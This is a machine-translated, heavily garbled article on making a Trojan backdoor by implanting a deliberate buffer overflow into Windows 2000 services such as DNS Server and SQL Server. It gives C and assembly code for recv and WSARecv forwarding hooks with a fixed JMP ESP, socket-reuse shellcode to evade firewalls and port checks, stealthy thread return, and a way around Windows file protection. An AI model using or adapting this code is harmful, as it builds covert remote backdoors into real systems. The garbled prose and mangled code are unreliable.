Author: FLASHSKY (original) Author E-mail: flashsky@xfocus.org site: www.xfocus.net Disclaimer: The author intended to achieve a Trojan horse, Trojan author is not a developer, but provide an idea: The buffer overflow attacks and Trojan / Launge combined Trojan realization means, through a simple prototype to verify the feasibility of this idea, and show a lot of features and advantages to see this implementation. It also brought the safety researchers to give higher concerns about this Trojan development technology, and proposed the method of killing and avoiding. The author provides documentation and presentation of the technical implementation of key code segments to verify its implementation, but does not provide source code and binary programs, anyone can use this article to perform its own technical research and code implementation, but you should be illegally Legal responsibility for behavior. One: Basic idea of overflowing implanted Trojan (back door) 1. How does Trojan (latter door) effectively concealment? Trojans and back doors are running on server-side, implementing an application server program that communicates and executes service requests with specific workers. The concealed means is a very important means. The main concealed issues currently have:? Application / code itself hidden, avoiding the obstacle killing tool. Avoid inspections of document integrity. • The concealment of the application process: If the Trojan process hidden? Automatic start code related hidden: If you need to modify the registration table under W2K, you need to start when the system starts automatically, or fills the service or driver? Communication: How to hide the port is not detected, how to spare the firewall, etc. The trend of Trojans / latte development is the level of writing to the driver and kernel. By intercepting system-called services to reach more concealed purposes, such as rootkit, etc., such Trojan / back door also has some problems: • There are many codes, more work performed in the client. The more things do, the more the spider silk is necessarily. And it is performed in active mode, and it is performed at any time, not just when the attacker communicates with it. • Affective performance: Since it is written to the kernel and drive, the affected surface is relatively large. ? Write a high skill and skills. 2. The idea of overflowing the implanted Trojan (back door) is then targeted for the above questions, we will have a thinking, which is to hide your own Trojan / Launny? It is best to make a remote utilization. General vulnerabilities, using this general vulnerability to achieve control, so only there is some signs when communicating with the attacker, and the code remains in the server side to the smallest, and it does not matter if it is observed, it is very impact on the system. small. • The execution code of a particular program depends on the data incorporated on the client, and these code exist only in memory. • The mechanism of specific code execution is as loaded as far as the normal mechanism of the system itself is loaded, and implemented 3. The advantage of overflowing the implanted Trojan (back door) is then elucidated by the above ideas, we will think that doing a vulnerability Trojan, then why is it going to an overflow vulnerability? The reason is: • Overflow vulnerability has an advantage of operating system versatility: On a large number of CPU platforms and operating system platforms, overflow is a general vulnerability, and the principle is the same, such a Trojan is easy to transplant. • Overflow vulnerability itself is difficult to check, with very good secret? Overflow itself can do remote control, many other vulnerabilities are to be controlled by other ways by vulnerability.
• Overflow transmits execution through the client to send execution to code, which can be modified as needed, itself has a certain flexibility, itself is not allowed to keep the server-side program. It is difficult to find only in the memory stack when executed. • The overflow code is performed inside the normal service, it is easy to implement the process hide, and inject it into a normal application, its start and control does not require other modification registry and other means. Moreover, it is easy to use the port and sockets of the own, and the port multiplexing and socket multiplexing can be implemented, and the port is hidden and fired. • Overflow itself has little impact on the performance of the program. It is fully passive to work. • Manufacturing a spilled vulnerability is relatively simple and easy to implement, even a very secure application, making an overflow bug is easy, such as a packaged code call: RECV (Sock, BUF, XXXX, FLAG), just simple Adjust the value of XXX's size makes it existed with an overflow vulnerability. 2: Implantation of a general overflow vulnerability. Generalized overflow vulnerabilities to be solved, but truly use Trojans / back door to implant an overflow vulnerability to apply, it can be widely used, which must make this overflow to have universal problems, mainly involved as follows Considering: • Overflow point positioning Because the length of the overflowed BUF, the offset relationship between the position and Retadd is uncertain, if each application needs to be manually adjusted, the client is required, the client Universal code cannot be implemented, therefore need to be implanted with overflows fixed overflow vulnerabilities. • JMP ESP code provides and positioning the overflow code to master the active time through Retdr, but because shellcode is dynamically assigned, it is impossible to accurately obtain its address, then it is necessary to use a statement like JMP ESP to implement jump. Some applications may have such statements, and some applications may have no such statements, and the address will not be the same, and the version of different systems and operating systems will change, so there is a need to provide a fixed JMP ESP code address. Give spilled shellcode to achieve universalization. • After overflow override access to the violation overflow, since the overflow BUF to RetadDR is likely to have other variables, the code is still executed in the upper text of the application in the app, these codes are still implemented in the upper text of the application. These variables may be referenced, and these variables are likely to be modified by our overlay code, resulting in access violations, causing programs to terminate or logging or performing exception handling code and cannot perform our overflow code and expose our whereabouts. • After the overflow override, execute the code over the overflow area, since the overflow BUF to RetadDR is likely to have other variables, the code is still executed in the upper text of the application, these codes It is most likely to modify the contents of the shellcode we have overwritten so that we cannot correctly execute the shellcode we want to perform after overflow, which generally causes unexpected termination and record of the process, exposing our whereabouts.
2. Improve the idea of implanting universal spillage vulnerabilities So how to effectively solve the above problems, implement a spillover vulnerability that can be utilized? Let's expand our thinking: a) Idea 1: Modify the extended stack (for fixed EBP / ESP references) In a function Call Fun's FUN execution space, the stack space is assumed to be as follows: ESP ---------- ---- "Variables 1 to 10 occupied space 40 bytes can be spaced by our spills, 400 bytes, other variables 11 to 20 occupied space 40 bytes EBP ------------------------------ "Retaddr incoming function parameters 1 to 4 occupancy space 16 So when entering FUNC execution, its generated compilation statement will be as follows: Push EBP MOV EBP, ESP (this time ESP points to Retadd's address) SUB ESP, 480 480 is the number of spaces with total variables). . . . . . . (Code Execution Zone) Add ESP, 480PUSH EBP We modify the statement of the assembly code as above: PUSH EBP MOV EBP, ESP SUB ESP, 1480. . . . . . . Add ESP, 1480PUSH EBP Corresponding Stack Space is ESP ---------- "Variables 1 to 10 Space 40 bytes can be overflowed by Buf1 occupied space 400 bytes other variables 11 to 20 Poscerted 40 bytes of space for more than 1000 bytes of space EBP -------- "Retaddr incoming function parameters 1 to 4 occupied space 16 If the reference to parameters is EBP XXX The reference to variables is in the way of ESP XXX. We will find that its impact on the application is not performed well, because the parameters and variables are relative to ESP, the location of EBP does not change. But we will find the following interesting places: 1. Only the place where Sub, ESP, XXX, ADD ESP, XXX is needed, and it will appear in the head of the function, which does not affect the size of the program, easy to find. 2. If we can achieve the problem of the overflow point positioning, if we can perform the value of the XXX size and the value of the BUF, the overflow point positioning can be achieved, and the overflow point is required to be positioned to 1000, we put the SUB ESP, 480 is changed to the SUB ESP, 1040 can reach the purpose of 1000. (Many out of 40 are variables above the buf, the position of the BUF); 3. If the increase in space is large enough, we can put the shellcode in this space, which can effectively avoid the problem that shellcode is executed by the subsequent program. 4. If the increase is large enough, we can put the shellcode in this space, so the SHELLCODE does not have modified because the overflow point position has been modified, so it can be effective for variables 10 to 20 Data address to reduce possible subsequent code execution of access violation issues, although not fully resolved, at least great possibilities.
This is a good idea, but the reality is cruel, because we find that one of the original imperatives is not established under different compiler options, the reference to the variable is ESP XXX, the reference to the incoming parameter is EBP XXX, the assembly code generated by different situations is complicated. It is possible to both the variable and incoming parameters of the ESP XXX method, and all possible references to variables and incoming parameters are EBP -XXX. the way. We have to use this idea to continue thinking about new solutions. b) Idea 2: Implant a forwarding function of a particular function is then the new idea is to implant the forwarded function for the overflow function. In other words, there is a call to RECV (SOCK, BUF, XXX, FLAG), modified him into Recvadd (Sock, BUF, XXX, FLAG), we attached to applying a recvadd function, this function is just simple For Recvadd (Sock, BUF1, XXX, FLAG), but its assigned memory space and a given XXX are inconsistent, there is an overflow vulnerability, then overflow the rebirth of the RECV can achieve overflow control. . 3. Implementation of generic generalization overflow vulnerability a) Function forwarding process and advantage process: i. Open a new BUF1, fixed length, so that overflow point fixed overflow II. Call RECV (Sock, BUF1, XXX, FLAG) Conduct III. Copy the contents of buf1 back to BUF, so it will not affect normal applications. Advantage: four problems that can be solved in a universal exploit vulnerability. IV. Because running in the RecvAdd function, the assignment of the BUF1 can be assigned according to the specified overflow point. It is possible to ensure sufficient overflow space, so that shellcode is stored in the BUF1 memory without affecting the variable V behind the EBP, can place a deformation code of JMP ESP, solve the positioning problem of JMP ESP VI. Recvadd only provides BUF1, after receiving Copy back to BUF, which will not involve problems 3 and questions 4VII. Do not affect the normal application of the program, and the additional function itself is relatively simple, very easy to implement, the amount of code is very small, 1, 2 hundred bytes, As the W2K's PE file format is aligned with 0x1000H, there is enough space to join the normal section of the PE file without affecting its size, other parameters.
b) Universal Vulnerabilities in Manufacturing Forwarding Functions The following is a C-code for a function of the Function for Recv (Socket S, CHAR FAR * BUF, INT LEN, INT FLAGS) {Int Num; Char BUF1 [0x1190] ; if (len> 0x1000) Num = Recv (S, BUF, LEN, FLAGS); // Description Universal overflow, because it does not affect the normal application else {Num = Recv (S, BUF1, 0X11A9, FLAGS); // Expanded to the standard specified overflow point if (num> 0) // determines whether the package {if (num <= len) // is determined whether it is overflow, no copy memory Memcpy (buf, buf1, num); ELSE / / Provide the address of JMP ESP, this address is automatically calculated and replaced with implantation: 1010101H {Num = -1; _ASM {MOV EAX, 1010101H MOV [ESP 11A4H], EAX;}}}} Return Num;} ) Adopt use i. Detection overflow and overflow return address judgment overflow is simple, only need to use RECV's return to receive byte numbers and given the given LEN to be compared, and can of course utilize the encoding check of the overflow address. Self-specific overflow. In addition, after expanding enough BUF1, Shellcode can be placed in BUF1 and does not need to overwrite the content below EBP, so that conditions are provided for valid thread security returns. Because a shellcode completed the task, this overflow thread processing is very troublesome. If it is broken, it will cause an exception to some applications, such as DNS Server, etc., and some will interrupt and record, the most The ideal way is that the preservation environment is completely returned to the original should continue to execute. ii. JMP ESP code We provide a machine code for the following assembly code at the end of the additional function: Sub ESP, XXXXJMP ESP (of course, in order to conceal, other equivalent functional deformation code, such as MOV EAX, ESP, JMP EAX) Then automatically calculate the address of this additional code when implanted, replacing the program code of the RecvAdd, replace this address to the valid return address when running detection overflow, and enables the overflowed shellcode jump.
III. Other environmental variables need to be utilized while considering the following factors, due to the protection of the following variables in the alternative function? Socket multiplexing? Retaddr: After the shellcode is complete, the thread is safely returned? This function Call the incoming parameter size to implement the ESP / EBP computing security returns to the ESP / EBP computing security back? Execute the saved accumulator to save the function, so that the security return is then considering the above case to forward the forward function. Compilation Code DWORD WINAPI Recvadd (Socket S, CHAR FAR * BUF, INT LEN, INT FLAGS) {_ASM {MOV EAX, [ESP 0CH] // Is the application greater than 1000H, CMP Eax, 1000H // This Application We press 1000H to do overflow points JG RECV / / may destroy the normal application SUB ESP, 119CH // Extended stack to the set of overflow points MOV EAX, [ESP 11A0H] // Save SC s o o o 使用用 m 使用 [用EAX MOV EAX, [ESP 119CH] / / Save Return Address for SHELLCODE to perform MOV [ESP 4], Eax // Back MOV DWORD PTR [ESP 8], 10H // Save Pressing Pressing Press Size Push ESI // Protect peripheral deposits Push EDI PUSH ECX PUSH EDX MOV EAX, [ESP 11BCH] PUSH EAX MOV ESI, [ESP 11BCH] PUSH 11A9H // Replace with an overflow value Lea ECX, [ESP 24h] Push ECX MOV EAX, [ESP 11BCH] Push Eax Call Recv // Recirculation TEST EAX, EAX JLE LOC_2 CMP EAX, ESI / / Decision Do you receive a package JLE LOC_1 MOV EDX, [ESP 11AX] XOR EAX, EAX DEC EAX CMP EDX, 0x90909090 // Compare Overflow Address Value JNE LOC_2 MOV EAX, 1010101H // Provides JMP ESP Address MOV [ESP 11ACH], EAX; JMP LOC_2LOC_1: // BUF1 content copy back BUF MOV ECX, EAX MOV EDI, [ESP 11B4H] MOV EDX, ECX Lea ESI, [ESP 1CH] SHR ECX, 2 REPE Movsd MOV ECX, EDX AND ECX, 3 REPE MOVSBLOC_2: Pop EDX // Pop-up Protection Peripheral Pop ECX Pop EDI POP ESI Add ESP, 119ch Retn 10H // If overflows occur,}}}}} JMPCode: _ASM {Sub ESP.0X1400 JMP ESP} 4. Trojan (back door)
Under W2K, we already have a complete forwarding function to implant the universal overflow vulnerability, how do this back door and Trojan implant application? Let's consider this problem: a) The structure of the entire implant code is as follows [RECVADD Address]: Store the address of the true RecvAdd function, which replaces the other party's JMP [RECV] [RECV] address value for this address value. Enter the effect of actual JMP [RECV] [RecvAdd Function]: Real Execute Code Area [RECV Jump Function]: Save the true RECV's jump address JMP [RECV] and Call [Recv] address, make the program You can forward real calls [JMP ESP code]: Store overflow execution JMP ESP execution code b) PE file node analysis and code attachment? Analysis section contact space Is there enough location to place an implantation? In import code section And the corresponding need to be replaced in the header of the execution code section (this example is the address of the RECV function) 1. Get the address of the RECV with the getProcAddress, find the import address of the corresponding address in the import code section of the process space? The address of JMP [RECV] or CALL [RECV] is found in the area. Record? Stop service to write open file? Replace JMP [RECV] or call [RECV] into jmp [recvadd] or call [recvadd]? Additional yourself Code C) Automatic calculation and replacement of additional code involves automatic calculation, there is a computational and replacement of the Calculation and replacement of JMP ESP code in the first RECVADD function itself, and replaces the position calculation and replacement of JMP ESP code. There are two types of calls in two calls, and the program needs to analyze and process I. JMP [Fun] is called when calling Fun, it is called [Fun], [Fun] is the address of JMP [Fun], which inside The address of the corresponding function in the import table of the true FUN is only required to replace JMP [Fun] to replace all the calls for the application to replace the destination II. Call [fun] replacement process in calling fun At the time of call [fun], [fun], the address of the corresponding function in the import table of the FUN This needs to replace all CALL [FUN] to replace all the calls for all calls for the application three: universal remote overflow shellcode1 . Function Positioning Processing is first obtained by getting the address of the memory search, load the API you need to use. This is a common skill. 2. General Socket multiplexing here discussed Socket multiplexing is in the W2K environment, for blocking sockets. a) Socket multiplexing meaning i. The server side does not need to open the port, and the port checks II. Communication with the port of the service itself, passively use the client's socket, can effectively spare the firewall B) Basic ideas i. Get effective The Socket descriptor can be incremented from a certain value via the socket, and then judge whether it is a socketii of Socket and whether it is your own IP address. Judgment the process of the associated socket descriptor to get the Socket descriptor is, Since the overflows master the control right when the code is running, this is likely that the socket has been closed normally.
So we may need to connect up to 2, a spill package, a state in which the other party RECV is stopped, if the first socket has been closed, you can judge the second to perform multiplexing processing, which requires shellcode as follows Judgment: 1. It is possible that the first one is not closed, then it is necessary to effectively determine the second, as long as the ID of the thread is instead of whether the thread can be 2. Before using the second Socket, you need to hang this socket processing, otherwise socket is not available to block the case, the recv code will stay on the code of NTWAITFORSINGLEOBJECT, then we will judge the EIP address of the thread environment. Basically, the rough corresponding thread can be obtained, but there may be other threads in the same location, then we can search for whether the corresponding Socket descriptor in the stack space of a valid thread is basically determined.
The following is the basic implementation C code: CID = getCurrentThreadIdadd (); pid = getCurrentProcessidAdd (); for (hid = 0x50; hid <0x10000; hid = hid 4) // socket descriptor starts from 0x50 {Num = Sizeof (AddR ); if (socket) hid, & addr, & num) == 0) {if (* (addr.sa_data 2) == 0x3c00a8c0) // Corresponding IP {// Send byte Whether Is a closed socket lbytesread = send (socket) HID, STRCMD, 4, 0); if (LbytesRead> 0) {for (AID = 0; AID <0x10000; AID = AID 4) {IF (CID! = AID) {OpenTHREADADD (THREAD_ALL_ACCESS, FALSE, AID); if (p1! = null) {ISOK = NTQUERYINFORMATIONTHREADDD (P1, 0, Prothrinfo, 0x1c, & num); if (ISOK == 0) {if (* (DWORD *) (prothrinfo 0x8) == pid) {SuspendThreadadd (p1); context.ContextFlags = CONTEXT_FULL; GetThreadContextadd (p1, & context); if (context.Eip == ((DWORD) NtWaitForSingleObjectadd 11)) {eip = context.Esp ; for (di = 0x80; di <0x170; di = di 4) {if (DWORD *) (EIP DI) == (socket) hid) {// can be processed normally} // is not The restoration of the thread execution and loop c) However, the above judgment method of the thread is only valid for the blocked socket, but the non-blocking Socket cannot be judged, but for the function to replace this manner, it is very Fortunately: You can make sure this Socket will definitely be closed when overflow control, so we can only try to judge this Socket descriptor only if you only use the getpeername function of Socket, and of course my example code uses the implant. Save this environment variable Method to reuse this socket3. The normal reference to environment variables actually we put three saved environment variables before the overflow BUF1, and after the SUB ESP, XXX, JMP ESP executed relative to the jump, this address is not fixed, which may The overflow function varies in returning the previous RETN XXX XXX, so use a fixed ESP XXX to reference these saved environment variables, you need our corresponding SUB ESP, XXX, JMP ESP XXX size, fortunate It is fixed for each fixed replacement API, so we can write a fixed XXX for each replacement function, as the content of its replacement function is also changed for different replacement functions. Our overflow implant is only common to the function call level, that is, regardless of the application A and B run in different versions of the system, as long as the corresponding function C is called, the overflow implantation of the C function of A and B It is common. 4. Thinking after threads, a) deleting or terminating threads, although simple, it is easy to cause exceptions and records.
b) Save the thread environment to return to the original call point, then you need to save and calculate the following: Save the Save the Splitcode before execution of SHELLCODE, save the address value that needs to be returned, calculates the recovered ESP / EBP, and put the corresponding address value. The biggest consideration is: After the accumulator is restored, you need to use the accumulator to read the return address value and put it in return before the ESP and the read function provides the function parameter size provided before the overflow makes normal ESP, so for the accumulation The protection of the device requires a little skill. c) Thread security returned code SUB ESP, 0x13FC // first open a space, protect several special accumulators Push eBPPUSH ECX // Because it is used for two, save Eax.ecxpush EAXSUB ESP, XXX / The stack space opened here is the space of the true shellcode used to store the space PUSH EBX to save other accumulators Push ECX PUSH EDX PUSH ESI Push EDI. . . . . . . . . . . . . . . . After the SHELLCODE function code is executed, the safety return of the county will return: TerminateProcess (Processinformation.hprocess, 0); // Kill the open CMD process _ASM {MOV EAX, k // k is the parameter length MOV EBX, the overflow function is incorporated. RetuTDR // Returns the address MOV ECX, 28FCH // ESP Reply to the open place Add ECX, ESP address SUB ECX, 4 // returns to RET, ESP, the ESP should be placed, the ESP should place the ESP of RET MOV [ ESP ECX], EBX // Store Real Back Address POP EDI // Recovery General Surplus Pop ESI Pop EDX POP EBX POP EDI POP ESI POP EBX ADD ESP, 4E4H // ESP Reduce SHELLCODE Stack Space MOV [ESP 23F8H], EAX // Write the value of K, you can use the POP EBP // to pop up several protector Pop Eax Pop ECX Add ESP without using other accumulators after recovering the accumulator. 23ECH // On the stack of K, you can use [ESP] to reference this value without using other accumulators, resulting in recovered accumulators to be destroyed ADD ESP, [ESP] // Use [ESP] Quote k Implement ESP K to calculate the true ESP value SUB ESP, 4 // advance 4 bytes, which is Retadd. Return RET} 5 with RET. Demonstrate remote Scoket multiplex shellcode overflow TEST service 4: Interpretation 1. System Document Integrity Protection Mechanism (SFP) for Win2K (SFP) Our main goal of our back door and Trojan is to modify the operational privileged service and system files, but everyone knows that after win2k, Windows has added SFP mechanism to protect system files. Integrity. Then only have the ability to modify the system-protected documents we need to be implanted, we can achieve the purpose. There are many ways to delete and update the protected file, but the basic idea is to synchronize the corresponding files in the backup / winnt / system32 / dllcache / and / winnt / servicepackfiles / i386 /, but this will cause the system to jump out of normal. Restoring the warning box of protected files out so that we will expose our whereabouts.
In fact, modifying the way to protect the SFP protection is very simple, that is: These two backup files, such a file can be modified normally without any tips. Of course, there are still many other methods to achieve this, such as modifying the verification mark of the corresponding file, etc., this method is the simplest and effective. a) Method 2 of deleting and changing the protected system files of Win2K. The versatile test is the original shape of a basic overflow implanted Trojan, then we finally use the actual test to verify that our prototype is generally universal and to meet our expectations. We have to do 2 experiments and generalization of the implanted spilled out of the actual application and services to achieve our remote control. a) Demonstration DNS Server Implant Recv Forward Remote Overflow Vulnerability and Control Substance: SiwiCode and client use and implant the Test service using and implanted TEST services are uniquely different. It is the parameters of a given Trojan executing program (mainly indicated information such as procedures that need to be implanted) 1. Demonstrates send overall bags before implant 2. After the demo is implanted, the program has reached our forwarding program 3 in the sending package. Demonstration does not affect normal applications 4. Demonstration After the overflow, the service continues to be available and can continue to overflow using b) The overflow implementation and demonstration of the WSARECV function is very familiar with the RECV forwarding overflow, but does this limit our app? Because most applications are implemented with a WSARECV function, we have a conclusion that our overflow implant is only common to the function call level, that is, regardless of the application A and B run on a different version of the system. As long as the corresponding function C is called, the overflow implantation of the C functions of A and B is common. For different functions, as long as this function is like fun (buf, len), len is a function of specifying the length of the BUF, is actually implanted overflow vulnerability. Then let's implement the overflow implantation and control of WSARECV, the example is the familiar SQL Server Socket.
i. general WSARECV replacement function int WINAPI WSARecvadd (SOCKET s, LPWSABUF buf, DWORD len, LPDWORD num, LPDWORD flags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionROUTINE) {_asm {mov eax, [esp 08H] mov eax, [eax] CMP EAX, 1000H jg wsarecv // Judgment Whether to overflow Sub ESP, 119CH / / Extended Stack MOV ESP, 119CH / / Extended Stack MOV EAX, [ESP 11A0H] / / Environment Variable MOV [ESP], ESP 119CH ] MOV [ESP 4], EAX MOV DWORD PTR [ESP 8], 1CH PUSH EBX // Reserve PUSH ESI PUSH EDI MOV EBX, [ESP 11B0H] // Reserved WSABUF Middle Heavy and Address Parameter MOV ESI , [EBX 4] MOV EAX, [EBX] Add ESI, EAX LEA EDI, [ESP 18H] // Save WSABUF's BUF to BUF1 in the BUF1, avoiding the overflow coverage can not recover Add Edi, EAX MOV ECX, 1194H SUB ECX, EAX MOV EAX, ECX SHR ECX, 2 REPE MOVSD MOV ECX, EAX AND ECX, 3 Repe Movsb Mov ESI, [EBX 4] MOV EDI, [EBX] MOV DWORD PTR [EBX], 1194H / / Expanded WSABUF length makes it possible to be overflowing MOV EAX, [ESP 11C4H] Push Eax Mov Eax, [ESP 11C4H] Push Eax Mov Eax, [ESP 11C4H] Push Eax Mov Eax, [ESP 11C4H] Push Eax Mov Eax, [ESP 11C4H] PU SH EAX PUSH EBX MOV EAX, [ESP 11C4H] Push Eax Call wsarecv // Forward to WSARECV PUSH ECX // Save WSAARECV Return to the meaningful three accumulator Push Eax Push EDX MOV EDX, [ESI 1190H] // Get WSABUF, if overflows the return address value MOV ECX, [ESP 11B4H] // Get it, you need to recover the back content MOV [ESI 1190H], ECX // Restore to BUF MOV ECX [ESP 1CH] // Read the returned address MOV [ESP 11B4H], ECX // Restore to the return address corresponding to the ESP, avoid being overwritten, this address is overwritten when saving WSABUF MOV [EBX], EDI // Write WSABUF Normal LEN Value Test Eax, EAX // Checks Whether to receive Package JNE LOC_4 MOV EBX, [ESP
